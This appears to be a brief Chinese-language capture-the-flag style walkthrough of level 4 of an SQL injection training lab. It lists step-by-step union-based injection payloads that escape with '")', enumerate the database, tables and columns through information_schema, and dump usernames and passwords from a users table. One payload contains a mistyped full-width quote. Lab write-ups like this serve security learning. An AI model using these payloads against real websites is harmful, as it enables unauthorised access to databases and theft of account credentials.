第四关如下：

查看其php代码：发现其与前三关的区别就在于id这里。即使用")进行逃离。

则步骤与前三关一致，细节上改变即可。

输入?id=1判断是字符型还是数字型注入

输入?id=-1") union select 1,2,3--+只显示2，3列。

输入?id=-1") union select 1,database(),version()--+查看数据库名和版本。

输入?id=-1“) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+查看上面查看到的数据库中的内容。

输入?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+，查询users表中的内容，查看到有username和password我们目标的表。

最后输入?id=-1") union select 1,username,password from users where id=1 --+，查看我们想要看到的账号密码。

以上就是第四关内容。